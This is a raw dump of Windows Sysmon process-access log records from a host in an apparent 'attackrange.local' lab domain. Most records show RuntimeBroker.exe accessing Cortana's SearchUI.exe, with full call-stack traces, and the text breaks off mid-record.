13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.310{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000012065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13711|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11620|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.295{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+